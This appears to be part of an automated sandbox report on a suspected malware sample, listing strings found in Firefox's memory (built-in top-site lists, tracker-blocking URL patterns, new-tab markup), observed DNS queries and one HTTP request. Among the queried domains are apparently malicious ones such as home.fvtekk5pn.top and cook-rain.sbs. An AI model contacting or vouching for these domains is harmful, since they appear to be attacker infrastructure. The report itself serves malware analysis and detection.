                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://*.adsafeprotected.com/*/unit/**://*.adsafeprotected.com/services/pub**://track.adform.net/Serving/TrackPoint/**://securepubads.g.doubleclick.net/gampad/*ad**://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://trends.google.com/trends/embed**://pixel.advertising.com/firefox-etp*://*.adsafeprotected.com/*/Serving/**://ads.stickyadstv.com/user-matching**://*.adsafeprotected.com/*/imp/*color-mix(in srgb, currentColor 9%, transparent)--autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://pubads.g.doubleclick.net/gampad/*xml_vmap2**://*.adsafeprotected.com/jload?*resource://gre/modules/ShortcutUtils.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3228655776.0000023769B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: FileUtils_closeSafeFileOutputStream*://track.adform.net/serving/scripts/trackpoint/FileUtils_openSafeFileOutputStreamresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeAtomicFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/facebook.svg*://www.everestjs.net/static/st.v3.js**://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://imasdk.googleapis.com/js/sdkloader/ima3.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://www.googletagmanager.com/gtm.js**://www.googletagservices.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://www.google-analytics.com/analytics.js**://www.google-analytics.com/plugins/ua/ec.js*://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.jsresource://gre/modules/DeferredTask.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3222383416.000002376930C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: browser.fixup.dns_first_for_single_wordsresource://devtools/shared/security/socket.jsGot invalid request to save JSON datadevtools/client/framework/devtoolsdevtools.performance.popup.feature-flagNo callback set for this channel.@mozilla.org/uriloader/handler-service;1{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}JSON Viewer's onSave failed in startPersistencebrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools/client/framework/devtools-browserDevToolsStartup.jsm:handleDebuggerFlagreleaseDistinctSystemPrincipalLoaderFailed to execute WebChannel callback:@mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPdevtools.performance.recording.ui-base-url@mozilla.org/dom/slow-script-debug;1WebChannel/this._originCheckCallbackFailed to listen. Callback argument missing.resource://gre/modules/NetUtil.sys.mjs@mozilla.org/uriloader/local-handler-app;1_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjsgecko.handlerService.defaultHandlersVersion@mozilla.org/uriloader/dbus-handler-app;1isDownloadsImprovementsAlreadyMigratedget FIXUP_FLAG_FORCE_ALTERNATE_URIhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sCan't invoke URIFixup in the content processhttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjshandlerSvc fillHandlerInfo: don't know this type_finalizeInternal/this._finalizePromise<http://www.inbox.lv/rfc2368/?value=%sresource://gre/modules/DeferredTask.sys.mjsScheme should be either http or httpsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/uriloader/web-handler-app;1@mozilla.org/network/file-input-stream;1https://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedProtocol<https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/JSONFile.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.inbox.lv/compose?to=%sresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/network/async-stream-copier;1@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamNon-zero amount of bytes must be specifiedSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionnewChannel requires a single object argumentpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/uriloader/handler-service;1Must have a source and a callback@mozil
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3228655776.0000023769B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: onPrefEMEGlobalEnabledChanged() id=onPrefEnabledChanged() - adding gmp directory onPrefEnabledChanged() - removing gmp directory uninstallPlugin() - unregistering gmp directory media.gmp-manager.checkContentSignatureKEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASONresource://gre/modules/AddonManager.sys.mjsThis should only be called from XPCShell testsstartup - adding clearkey CDM directory - the given reason to update is not supportedfindUpdates() - found update for media.gmp-manager.cert.checkAttributesKEY_PLUGIN_LAST_INSTALL_FAIL_REASONmedia.gmp-manager.cert.requireBuiltInresource://gre/modules/UpdateUtils.sys.mjssitepermsaddon-provider-registereddom.sitepermsaddon-provider.enabled@mozilla.org/spellchecker/user;1startup - adding gmp directory failed with resource://gre/modules/AddonManager.sys.mjsipc:first-content-process-createdpictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://web-assets.toggl.com/app/assets/scripts/*.js@mozilla.org/addons/addon-manager-startup;1*://*.imgur.com/js/vendor.*.bundle.js*://pub.doubleverify.com/signals/pub.js**://libs.coremetrics.com/eluminate.js*://auth.9c9media.ca/auth/main.js*://connect.facebook.net/*/sdk.js*https://smartblock.firefox.etp/play.svg@mozilla.org/network/file-output-stream;1@mozilla.org/network/atomic-file-output-stream;1*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/all.js*resource://gre/modules/FileUtils.sys.mjs*://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.js*://cdn.branch.io/branch-latest.min.js*FileUtils_openAtomicFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3220663743.000002376927E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: www.google.com
                      Source: global trafficDNS traffic detected: DNS query: apis.google.com
                      Source: global trafficDNS traffic detected: DNS query: play.google.com
                      Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                      Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                      Source: global trafficDNS traffic detected: DNS query: c.msn.com
                      Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                      Source: global trafficDNS traffic detected: DNS query: api.msn.com
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: home.fvtekk5pn.top
                      Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
                      Source: global trafficDNS traffic detected: DNS query: fvtekk5pn.top
                      Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: youtube.com
                      Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                      Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: example.org
                      Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                      Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                      Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                      Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                      Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: 824db60d2b.exe, 00000018.00000003.2783269577.00000000077F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
